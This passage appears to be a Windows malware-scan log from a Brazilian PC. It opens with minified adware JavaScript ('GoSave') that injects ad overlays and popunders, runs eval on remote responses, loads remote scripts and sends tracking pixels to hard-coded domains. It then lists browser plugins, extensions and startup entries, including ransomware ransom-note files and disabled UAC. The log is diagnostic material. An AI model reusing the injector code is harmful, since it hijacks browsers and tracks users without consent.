#DDDDDD','border-radius':'5px',height:'90%',padding:'0'}},children:[{type:'div',attrs:{style:{margin:'0',padding:'2px',left:'0',width:'inherit',top:'0','background-color':'transparent'},id:'__modal_close'},children:[{type:'img',attrs:{src:'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABA1JREFUeNp8VW9IW1cUP3l5eS9iZx+amsaNtNZsdtgttnSkBYmRLEsVs1rwi9Z9Udm6YZXYTr+MaMcm4idXPwTUD05BWP3bNBsleREUoabMTzr/wNxEjQqCgoj/Gr2792re8prUC4f3znnn/M65757zuwqEEMRbLMfxXzocV/MLCswfZ2bakpKSTAqFAra3t4ML//zr93pfjL3weOb29vYO4gIQ4GjBwWx1dbVlfn5e3NjYQBHBOpqamkLRtoWFBfEh9mUYhn0bR6ZotTrB5/O5SNDq6irq6OhAxcXFSK1Wy8Rms6G2tja0vLxME4iBgEt78aIQF1in0wnT09Nu4uj1epHRaEQ8z8eARovJZELj4+ORHbk/0OsFGTCLV2BkhFba1dUlBUYDn5WkpaWFggeDQRfHq1kJ2NXQaIlUelaFZ0l7ezsF/7mpyUKBNamp/NLSkogFZWVlyZytVivKz8+PATEYDKimpgZd0GolW9L582h2dhatra2JaWlpPNR+/9hIMrndbllwTk6OdPrNzc3UlpCQgLKzsykAsXd2dspinE4ntT958qORseZZzaTthoeHZS2I+xX29/epXlFRAY2NjYB3BL29vaDRaKh9Z2dHiiE9PjA0BMfHx3Dnjt0MoVDIs7i4GPe/lZaWopWVFaly4hd57+/vjxszMTGB1tfXPYxKpTJtbm7GDA1Zg4ODUFdXB4eHh1RPTEykz9HRUSgrK4s7cBgUlEqliSFbODo6kn0ktsjC0wW7u7uy78QWb0VjMViCycnJcR0/NRqhu7sbBEGgeiSovLwcGhoaqB4th+EwpKSkEJcgg8fSjwkGMjIyZKDJ2KEHg0aSku0/dNbCwcEJ51RWVkJ1TS28OQZ4g/OF8fMIi/7SJdja2vIzflEcI44Oh0MG/Mm1azLQkpISGHjWB85HjyXwz25eP/0H+Fzwo6joLrx37hw8/8M3Btdv3ODxKYuEvTSp2pi+rK+vp+/4kBEoT8RssZIJQ+kfZlJdgckNFCr00ucnHSMab97iaQf82tNDR7q1tfWdI0uAFcr/wRklhxiGk/QH335H27BvYMgiccXly+ks7mdKQlVVVTGgfIIasbRiVgIiVSpZkoxDn9vtmGbXSc+7dPp0Vkablrw8AQNT2mzC25RAsXBYlKqTKiPgzGmCr795gFZCIVKt2154V4hL9F/Y7QLJSsAnJycRHmWkuZCKOBWumFTHnACSX1J07x4KBEbo9jHxuAqLimVEr3j7zku/coV9+svTnNu3b/2AVSuZOsx8MDMzg09eAQbDR6DXv09PH6/Aq9d//uSsfTT+99xfYdmwvOsyzc3N5e/f/+pqYWGBmeM4GzaZTj8Fw+Gwf9Dz+9hvz/rmRsWXcS/T/wQYAL8KChTqW9Z8AAAAAElFTkSuQmCC', style:{cursor:'pointer'}}},{type:'span',attrs:{style:{position:'relative','margin-left':'20px','font-size':'12px','line-height':'33px'}},children:[{type:'#text',text:'Ads by '+d.extName}]}]},{type:'iframe',attrs:{style:{border:'0'},id:'__modal_iframe',width:'100%',height:'100%',frameboarder:'0',scrolling:'yes',marginheight:'0',marginwidth:'0',allowtransparency:'true',src:''}}]}]};try{var e=d.dom.json_to_html(g)}catch(l){}e&&(document.getElementsByTagName('body')[0].appendChild(e),document.getElementById('__modal_iframe').src= a,d.pixel('0','1'),b(),f())}}};a.getKeywords=function(){var a=document.title,b=document.getElementsByTagName('meta');if(b)for(var d=0,g=b.length;dl[h].length||(b[l[h]]?b[l[h]]++: b[l[h]]=1)}catch(m){}var e=[],k;for(k in b)e.push([k,b[k]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(k=0;k';b.setAttribute('style','height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0');b.innerHTML=d;c.insertBefore(b,c.children[0])}};a.prepareUrl=function(){var c='?',b;for(b in d.directParams)c+=b+'='+d.directParams[b]+'&';c+='k='+encodeURIComponent(d.getKeywords());return'//'+a.hostnames['http:'==window.self.location.protocol?0:1]+c};a.tp=function(c){if(c){c=a.utils.l.decode(c);try{a.response=eval(c)}catch(b){}if(a.response&&a.response[0]&&(a.response[0][0]= a.response[0][0].replace('zig_pp','rTaFvTr8vTwGpi5FrTDXrjnGpjCFrHg7qa%3D%3D'),c=a.response[0][3],c=7,7===c&&'function'==typeof a.products['code_'+c]))a.products['code_'+c](a.response)}};a.getInstructions=function(c){var b='&cb='+a.prefix+'.tp';a.utils.msie?a.utils.inject_script(c+b):a.utils.ajax.get(c,function(b){b&&a.tp(b)})};a.initPop=function(){if(-1!==window.location.href.indexOf(a.pop_collision_id))return a.injectComplianceBanner();var c=a.prepareUrl();d.utils.getInstructions(c,'tp')};a.injectOnload=function(){'complete'=== document.readyState||10d.utils.msie||(window.self==window.top&&(a.utils.msie?a.injectOnload():a.initPop()),'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a))}};}catch(e){};try{new function(){if(!document.getElementById('__if72ru4sdfsdfruh7fewui_once')){(function(){var a=document.createElement('div');a.id='__if72ru4sdfsdfruh7fewui_once';a.setAttribute('style','display:none;');var c=document.getElementsByTagName('body')[0];c&&c.appendChild(a)})();var a=this;a.utils=new function(){var b=this;b.JSON=new function(){this.parse=function(c){try{return'undefined'!==typeof JSON&&'function'==typeof JSON.stringify?JSON.parse(c):eval('var a='+c)}catch(a){return!1}}};b.cookie=new function(){var c= this;c.setCookie=function(c,a,b){if(b){var e=new Date;e.setTime(e.getTime()+864E5*b);b='; expires='+e.toGMTString()}else b='';document.cookie=c+'='+a+b+'; path=/'};c.getCookie=function(c){c+='=';for(var a=document.cookie.split(';'),b=0;b=d-g}};b.getInstructions=function(c, d){b.msie?b.inject_script(c+('&cb='+a.prefix+'.'+d)):b.ajax.get(c,function(c){if(c)a[d](c)})};b.l=new function(){var a=this;a.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';a.encode=function(d){d=a._utf8_encode(d);for(var b='',g=0;g>2,e=(e&3)<<4|h>>4,m=(h&15)<<2|l>>6,n=l&63;isNaN(h)?m=n=64:isNaN(l)&&(n=64);b=b+a.xlat.charAt(k)+a.xlat.charAt(e)+(64==m?'=':a.xlat.charAt(m))+(64==n?'=':a.xlat.charAt(n))}return b}; a._utf8_encode=function(a){if(a&&a.length){for(var c='',b=0;be?c+=String.fromCharCode(e):(127e?c+=String.fromCharCode(e>>6|192):(c+=String.fromCharCode(e>>12|224),c+=String.fromCharCode(e>>6&63|128)),c+=String.fromCharCode(e&63|128))}return c}return a};a.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var c='',b=0;b>2,n=(l&3)<<6|k,c=c+String.fromCharCode(e<<2|h>>4);64!=l&&0e)c+=String.fromCharCode(e),b++;else if(191e)var h=a.charCodeAt(b+1),c=c+String.fromCharCode((e&31)<<6|h&63),b=b+2;else var h=a.charCodeAt(b+1),l=a.charCodeAt(b+2),c=c+String.fromCharCode((e&15)<<12| (h&63)<<6|l&63),b=b+3}return c}};b.ajax=new function(){this.get=function(a,b){try{var f=new XMLHttpRequest;f.open('GET',a,!0);f.withCredentials=!0;f.onreadystatechange=function(){4==f.readyState&&b(f.responseText)};f.send()}catch(g){}}};b.randomChar=function(){for(var a='',b=0;2>b;b++)a+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52*Math.random()));return a};b.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a= parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();b.inject_script=function(c){var b=document.getElementsByTagName('body')[0],f=document.createElement('script');f.type='text/javascript';f.id='id_'+a.prefix;f.src=c;b&&b.appendChild(f)};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getVert=function(){var a=localStorage.getItem('sk398erjds2d');return a?a:b.forexVert()};b.browser=function(){var a=navigator.userAgent.toLowerCase(), b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();b.getNodeTextProp=function(a){return'textContent'in a?'textContent':'innerText'in a?'innerText':!1};b.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g, function(a,b,c){return c.toUpperCase()})};b.get_computed_style='function'!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(d){'float'==d&&(d='styleFloat');d=b.dhtml_prop_name(d);return'object'==typeof a.currentStyle&&null!=a.currentStyle&&'undefined'!=typeof a.currentStyle[d]?a.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}}};a.prefix='if72ru4sdfsdfruh7fewui';a.version='0.1.1';a.pop_collision_id='__ipu=';a.pixel_token= 'px.pluginh';a.pixel_data_token='__pdt';a.pixelHostname=function(){try{return'direct_pop.'+eval('[\"profficed.com\",\"winnermore.com\"]')['https:'==window.self.location.protocol?1:0]}catch(a){return['direct_pop.winneri.info','direct_pop.winnermore.org']['https:'==window.self.location.protocol?1:0]}}();a.extName='GoSave';a.pid='724';a.cc='BR';a.eid='1120';a.hid='17643591738891339707';a.prid=687;a.lt='180';a.jpshort='7HITjTcr';a.platform_version= '9';a.fallbackHostnames=['sitewebred.info','privilegesbox.net'];try{a.stngs=eval('xzxzxx_xzxzxzx = {\"szy_domain\":[\"epicscanpronice.name\",\"albumsuper.info\"],\"ad_sizes\":[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]]}')}catch(r){a.stngs={szy_domain:['gamesjobstarblack.in','privilegesbox.net'],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13]]}}var q;q=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.szy_domain&&a.stngs.szy_domain instanceof Array?a.stngs.szy_domain: a.fallbackHostnames;a.hostnames=q;a.serverHostnames=['superiends.org','go.turboloves.net'];a.manhattanHostname=['sitewebred.com','gadgetproffi.com'];a.body=document.getElementsByTagName('body')[0];a.directParams={subid:a.pid,subid1:a.hid,subid2:a.eid,subid3:a.prid,direct:'1',tid:'3'};a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,d,f,g,e){'undefined'==typeof g&&(g=window);g.addEventListener(c,d,f);e&&a.cache.push([c,d,f,g])}:window.attachEvent?function(c,d, f,g,e){'undefined'==typeof g&&(g=window);g['e'+c+d]=d;g[c+d]=function(){g['e'+c+d](window.event)};g.attachEvent('on'+c,g[c+d]);e&&a.cache.push([c,d,f,g])}:function(){};a.remove=window.removeEventListener?function(a,b,f,g){'undefined'==typeof g&&(g=window);g.removeEventListener(a,b,f)}:window.detachEvent?function(a,b,f,g){'undefined'==typeof g&&(g=window);g.detachEvent('on'+a,g[a+b]);g[a+b]=null;g['e'+a+b]=null}:function(){};a.flush=function(){for(var c=0;cwindow.close();\\x3c/script>';document.getElementsByTagName('body')[0].appendChild(h);var k=document.createEvent('MouseEvents');k.initMouseEvent('click',!0,!0,window,0,0,0,0,0,!0,!1,!1,!0,0,null);h.dispatchEvent(k);h.parentNode.removeChild(h)}p.msie&& (e.opener.window.focus(),window.self.window.focus(),window.focus())}catch(l){}};document.addEventListener?document.addEventListener('click',m,!1):document.attachEvent('onclick',m)})(c,l,k,m,n,h)})(c)})(c[0][0])};b.code_5=function(b){var d=b[0][0],f=function(){window.removeEventListener?document.removeEventListener('click',f,!1):document.detachEvent('onclick',f);a.pixel('0','5');var b=document.createElement('a');b.href=d;document.getElementsByTagName('body')[0].appendChild(b);var c=document.createEvent('MouseEvents'); c.initMouseEvent('click',!1,!0,window,0,0,0,0,0,!0,!1,!1,!0,0,null);b.dispatchEvent(c);b.parentNode.removeChild(b);a.pixel('0','1')};document.addEventListener?document.addEventListener('click',f,!1):document.attachEvent('onclick',f)}};a.getKeywords=function(){var a=document.title,c=document.getElementsByTagName('meta');if(c)for(var d=0,f=c.length;de[h].length||(c[e[h]]?c[e[h]]++:c[e[h]]=1)}catch(l){}var g=[],k;for(k in c)g.push([k,c[k]]);g.sort(function(a,b){return b[1]-a[1]});g=g.slice(0,25);for(k=0;k';c.setAttribute('style','height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0');c.innerHTML=d;b.insertBefore(c,b.children[0])}};a.prepareUrl=function(){var b='?',c;for(c in a.directParams)b+= c+'='+a.directParams[c]+'&';b+='k='+encodeURIComponent(a.getKeywords());return'//'+a.hostnames['https:'==window.self.location.protocol?1:0]+b};a.addParamsForPixel=function(){var b='//'+a.pixelHostname+'?',c=a.hostnames['https:'==window.self.location.protocol?1:0],c={pid:a.pid,cc:a.cc,eid:a.eid,hid:a.hid,v:a.version,ch:'1',cid:a.response[0][2],tid:a.directParams.tid,adtid:a.response[0][4],smid:a.response[0][3],pbid:'0',oh:encodeURIComponent(a.response[0][0]),sh:encodeURIComponent(c)},d;for(d in c)b+= d+'='+c[d]+'&';b=b.slice(0,-1);b=a.utils.l.encode(b);return b.replace(/=/g,'')};a.falsePixel=function(){var b='//'+a.pixelHostname+'?',c={pid:a.pid,cc:a.cc,eid:a.eid,hid:a.hid,v:a.version,ch:'-1',cid:'0',tid:'3',adtid:'0',smid:'0',pbid:'0',oh:'0',sh:encodeURIComponent(a.hostnames['https:'==window.self.location.protocol?1:0])},d;for(d in c)b+=d+'='+c[d]+'&';b=b.slice(0,-1);(new Image).src=b};a.tp=function(b){if(b){b=a.utils.l.decode(b);try{a.response=eval(b)}catch(c){}if(!a.response||!a.response[0])return a.falsePixel(); a.response[0][0]=a.response[0][0].replace('zig_pp','rTaFvTr8vTwGpi5FrTDXrjnGpjCFrHg7qa%3D%3D');b=a.response[0][3];if(1!==b&&2!==b)if(0===b&&(b=3),'function'==typeof a.products['code_'+b])a.products['code_'+b](a.response);else a.products.code_3(a.response)}};a.getInstructions=function(b){var c='&cb='+a.prefix+'.tp';a.utils.msie?a.utils.inject_script(b+c):a.utils.ajax.get(b,function(b){b&&a.tp(b)})};a.initPop=function(){if(-1!==window.location.href.indexOf(a.pop_collision_id))return a.injectComplianceBanner();var b= a.prepareUrl();a.utils.getInstructions(b,'tp')};a.checkIfPop=function(){return window.opener&&window.self==window.top&&-1==document.cookie.indexOf('xcddsa')&&-1==window.self.location.href.indexOf('px.pluginh')&&-1==window.self.location.hostname.indexOf('earchfu')&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&!document.referrer.match(/cpops-\\d+\\.html/)&&-1==document.referrer.indexOf('px.pluginh'))&&-1==window.self.location.href.indexOf('nkths.co')&&-1==window.self.location.href.indexOf('ally.asi')&& -1==window.self.location.href.indexOf('/amz/')&&!window.self.location.href.match(/cpops-\\d+\\.html/)&&-1==window.self.location.hostname.indexOf('getjs')&&-1==window.self.location.hostname.indexOf('hsbc')&&3>history.length&&'https:'!==location.protocol};a.checkIfServer=function(){for(var b=0;ba.setProductPriority[b]&&\r\n(a.min=a.setProductPriority[b]),a.max>2,c=(c&3)<<4|k>>4,m=(k&15)<<2|h>>6,l=h&63;isNaN(k)?m=l=64:isNaN(h)&&\r\n(l=64);d=d+a.xlat.charAt(n)+a.xlat.charAt(c)+(64==m?'=':a.xlat.charAt(m))+(64==l?'=':a.xlat.charAt(l))}return d};a._utf8_encode=function(a){if(a&&a.length){for(var b='',c=0;cf?b+=String.fromCharCode(f):(127f?b+=String.fromCharCode(f>>6|192):(b+=String.fromCharCode(f>>12|224),b+=String.fromCharCode(f>>6&63|128)),b+=String.fromCharCode(f&63|128))}return b}return a};a.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var b='',c=0;c<\r\na.length;){var f=this.xlat.indexOf(a.charAt(c++)),k=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),n=this.xlat.indexOf(a.charAt(c++)),m=(k&15)<<4|h>>2,l=(h&3)<<6|n,b=b+String.fromCharCode(f<<2|k>>4);64!=h&&0f)b+=String.fromCharCode(f),c++;else if(191f)var k=a.charCodeAt(c+1),b=b+String.fromCharCode((f&\r\n31)<<6|k&63),c=c+2;else var k=a.charCodeAt(c+1),h=a.charCodeAt(c+2),b=b+String.fromCharCode((f&15)<<12|(k&63)<<6|h&63),c=c+3}return b}};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.getParams=function(){var b=location.href.split('__pdt');1b.message.length?b.message:b.message.slice(0,255),d=255>location.href.length?location.href:location.href.slice(0,255);(new Image).src=a.createPixelUrl({ch:8020,oh:d,sh:e})}},'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a),a.initDirectPixel())};}catch(e){}})();"); FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:42.0 FF - user.js - File not found FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_20_0_0_267.dll () FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw_1216156.dll (Adobe Systems, Inc.) FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.5.1: C:\Program Files\Battlelog Web Plugins\2.5.1\npbattlelog.dll File not found FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google) FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation) FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation) FF - HKLM\Software\MozillaPlugins\@raidcall.en/RCplugin: C:\Users\Lorenzo\AppData\Roaming\raidcall\plugins\nprcplugin.dll File not found FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.29.1\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.29.1\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF - HKCU\Software\MozillaPlugins\@nsroblox.roblox.com/launcher: C:\Program Files\Roblox\Versions\version-f7131a583a8d4ea7\\NPRobloxProxy.dll () FF - HKCU\Software\MozillaPlugins\@nsroblox.roblox.com/launcher64: C:\Program Files\Roblox\Versions\version-f7131a583a8d4ea7\\NPRobloxProxy64.dll () FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Lorenzo\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS) FF - HKCU\Software\MozillaPlugins\gastecnologia.com.br/sf/uni: C:\Users\Lorenzo\AppData\Local\GAS Tecnologia\GBBD\npsf_uni.dll (GAS Tecnologia) FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 39.0.3\extensions\\Components: C:\Program Files\Mozilla Firefox\components FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 39.0.3\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{87F8774F-B485-47E2-A755-A40A8A5E8873}: C:\Users\Lorenzo\AppData\Local\GAS Tecnologia\GBBD\uni\xpi [2015/11/24 17:35:01 | 000,000,000 | ---D | M] [2014/09/18 16:03:32 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Lorenzo\AppData\Roaming\mozilla\Extensions [2015/12/17 23:39:17 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Lorenzo\AppData\Roaming\mozilla\Firefox\Profiles\u78s41b8.default\extensions [2015/12/17 09:49:10 | 000,000,674 | ---- | M] () -- C:\Users\Lorenzo\AppData\Roaming\mozilla\firefox\profiles\u78s41b8.default\searchplugins\navegaki.xml [2015/11/23 12:56:13 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de Programas\Mozilla Firefox\browser\extensions [2015/12/17 22:46:01 | 000,000,000 | ---D | M] (Default) -- C:\Arquivos de Programas\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [color=#E56717]========== Chrome ==========[/color] CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_1\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_1\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_1\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.60_1\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\eddldcghfdhmdcfmjolaefkjglmeobpf\2.1.4_0\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\iicpjbgbdmeebbjdelgojldchbmjakip\0.9_0\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl\8.0.0.9098_0\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.1.2.0_1\ CHR - Extension: No name found = C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_1\ O1 HOSTS File: ([2016/01/08 11:27:36 | 000,000,822 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de Programas\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation) O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Arquivos de Programas\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) O2 - BHO: (GbIehObj Class) - {C41A1C0E-EA6C-11D4-B1B8-444553540008} - C:\Arquivos de Programas\GbPlugin\gbiehuni.dll (Banco Itaú Unibanco) O4 - HKLM..\Run: [] Reg Error: Value error. File not found O4 - HKLM..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" File not found O4 - HKLM..\Run: [BlueStacks Agent] C:\Arquivos de Programas\BlueStacks\HD-Agent.exe (BlueStack Systems, Inc.) O4 - HKLM..\Run: [Diebold - Warsaw] C:\Arquivos de Programas\Diebold\Warsaw\core.exe (GAS Tecnologia LTDA) O4 - HKLM..\Run: [HDAudDeck] C:\Program Files\VIA\VIAudioi\VDeck\VDeck.exe (VIA) O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.) O4 - HKLM..\Run: [NvBackend] C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe (NVIDIA Corporation) O4 - HKLM..\Run: [ShadowPlay] C:\Windows\System32\nvspcap.dll (NVIDIA Corporation) O4 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000..\Run: [] Reg Error: Value error. File not found O4 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000..\Run: [9fca490d-c498-bb67-ed77-08e27d35e839] C:\Users\Lorenzo\AppData\Local\Microsoft\c098a48e-8b3d-bad6-e23a-4850e6dbc533\4dd3c0ea-0595-43bc-b289-c24ef44cc42f.exe File not found O4 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000..\Run: [AlcoholAutomount] C:\Program Files\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe (Alcohol Soft Development Team) O4 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner.exe (Piriform Ltd) O4 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000..\Run: [Clownfish] C:\Program Files\Clownfish\Clownfish.exe (Bogdan Sharkov) O4 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000..\Run: [GoogleChromeAutoLaunch_0ED881CACCE3018D6AF32EC49A6AC4D6] C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) O4 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000..\Run: [Steam] C:\Program Files\Steam\steam.exe (Valve Corporation) O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation) O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation) O4 - Startup: C:\Users\Lorenzo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML () O4 - Startup: C:\Users\Lorenzo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG () O4 - Startup: C:\Users\Lorenzo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.TXT () O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: TaskbarNoNotification = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HideSCAHealth = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run: 202579643 = C:\ProgramData\mscrafmn.exe () O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run: = Reg Error: Value error. File not found O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 0 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_BITMAP = 2 (Microsoft) O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Main present O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Main present O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Main present O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Main present O7 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present O7 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\Software\Policies\Microsoft\Internet Explorer\Main present O7 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O7 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: TaskbarNoNotification = 1 O7 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HideSCAHealth = 1 O7 - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoSearchProgramsInStartMenu = 0 O8 - Extra context menu item: E&xportar para o Microsoft Excel - C:\Arquivos de Programas\Microsoft Office\Office12\EXCEL.EXE (Microsoft Corporation) O9 - Extra Button: Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Arquivos de Programas\Microsoft Office\Office12\ONBttnIE.dll (Microsoft Corporation) O9 - Extra 'Tools' menuitem : &Enviar para 